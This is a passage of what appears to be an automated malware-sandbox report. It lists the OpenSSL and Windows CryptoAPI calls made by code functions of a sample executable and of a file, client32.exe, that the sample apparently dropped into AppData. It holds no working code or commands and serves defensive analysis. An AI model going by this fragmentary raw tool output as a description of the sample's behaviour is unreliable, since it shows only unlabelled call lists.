                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B13DE EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B13DE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1181 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1181
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,1_2_00007FFDFB0B1A05
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2365 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B2365
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B17F8 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B17F8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11A930 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB11A930
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CE948 CRYPTO_free,1_2_00007FFDFB0CE948
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2374 CRYPTO_free,1_2_00007FFDFB0B2374
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB112F60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFB112F60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B4FA0 CRYPTO_free,1_2_00007FFDFB0B4FA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1393 OSSL_PROVIDER_do_all,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,1_2_00007FFDFB0B1393
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1B90 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB0B1B90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB106E70 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB106E70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1677 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B1677
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A23 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0B1A23
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E8D90 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0E8D90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BCDC0 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,1_2_00007FFDFB0BCDC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B195B CRYPTO_zalloc,EVP_MAC_free,EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFB0B195B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFDFB0B105F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB100E50 CRYPTO_memcmp,1_2_00007FFDFB100E50
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1E65 ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFDFB0B1E65
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B11A9 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFB0B11A9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11ACD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB11ACD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2112 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2112
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D8D10 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,1_2_00007FFDFB0D8D10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B21E4 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,1_2_00007FFDFB0B21E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DCD30 CRYPTO_THREAD_write_lock,OPENSSL_sk_new_null,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,1_2_00007FFDFB0DCD30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB110D30 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB110D30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D0380 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFB0D0380
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B25EF CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,1_2_00007FFDFB0B25EF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C43A0 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,1_2_00007FFDFB0C43A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B139D memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B139D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1B54 memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB0B1B54
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1401 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1401
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FE260 CRYPTO_free,1_2_00007FFDFB0FE260
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB12A2C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,1_2_00007FFDFB12A2C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2180 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2180
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1222F0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB1222F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B4300 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B4300
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB108350 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFB108350
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B23D8 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0B23D8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D21C0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data,1_2_00007FFDFB0D21C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C21F0 CRYPTO_THREAD_run_once,1_2_00007FFDFB0C21F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FE200 CRYPTO_free,1_2_00007FFDFB0FE200
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1389 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B1389
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F4230 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0F4230
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F2230 ERR_new,ERR_set_debug,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,1_2_00007FFDFB0F2230
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CE227 CRYPTO_THREAD_write_lock,1_2_00007FFDFB0CE227
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B198D CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B198D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1AB4 CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1AB4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1893 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1893
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1080A0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB1080A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FE0C1 CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0FE0C1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B24C8 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,1_2_00007FFDFB0B24C8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B26DF BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,1_2_00007FFDFB0B26DF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB114110 ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,1_2_00007FFDFB114110
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1140 CRYPTO_free,1_2_00007FFDFB0B1140
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C4790 CRYPTO_get_ex_new_index,1_2_00007FFDFB0C4790
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB12A770 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB12A770
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B17DF ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B17DF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C47F0 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0C47F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB124809 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB124809
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F8810 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0F8810
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B136B ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B136B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B14CE CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB0B14CE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F86D0 OPENSSL_cleanse,CRYPTO_free,1_2_00007FFDFB0F86D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B26AD ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFB0B26AD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB110700 ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFDFB110700
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1226E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,1_2_00007FFDFB1226E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1166E0 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB1166E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1CA3 CRYPTO_strdup,CRYPTO_free,1_2_00007FFDFB0B1CA3
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B17E9 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB0B17E9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1771 CRYPTO_free,1_2_00007FFDFB0B1771
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B22D4 CRYPTO_malloc,CONF_parse_list,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B22D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1488 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B1488
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FE5A0 CRYPTO_free,1_2_00007FFDFB0FE5A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F25D0 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,1_2_00007FFDFB0F25D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DE5E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFDFB0DE5E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B120D EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,1_2_00007FFDFB0B120D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CA600 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFDFB0CA600
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1212 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB0B1212
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B114F CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0B114F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F8620 CRYPTO_free,1_2_00007FFDFB0F8620
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B241E CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B241E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B18B6 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B18B6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A0F ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,CRYPTO_memcmp,ERR_set_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_pop_to_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,strncmp,strncmp,strncmp,strncmp,strncmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1A0F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B84B0 CRYPTO_zalloc,CRYPTO_free,1_2_00007FFDFB0B84B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1F23 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFB0B1F23
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB122510 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFB122510
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB114540 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB114540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1492 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1492
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FE540 CRYPTO_free,1_2_00007FFDFB0FE540
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCE46D0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_6CCE46D0
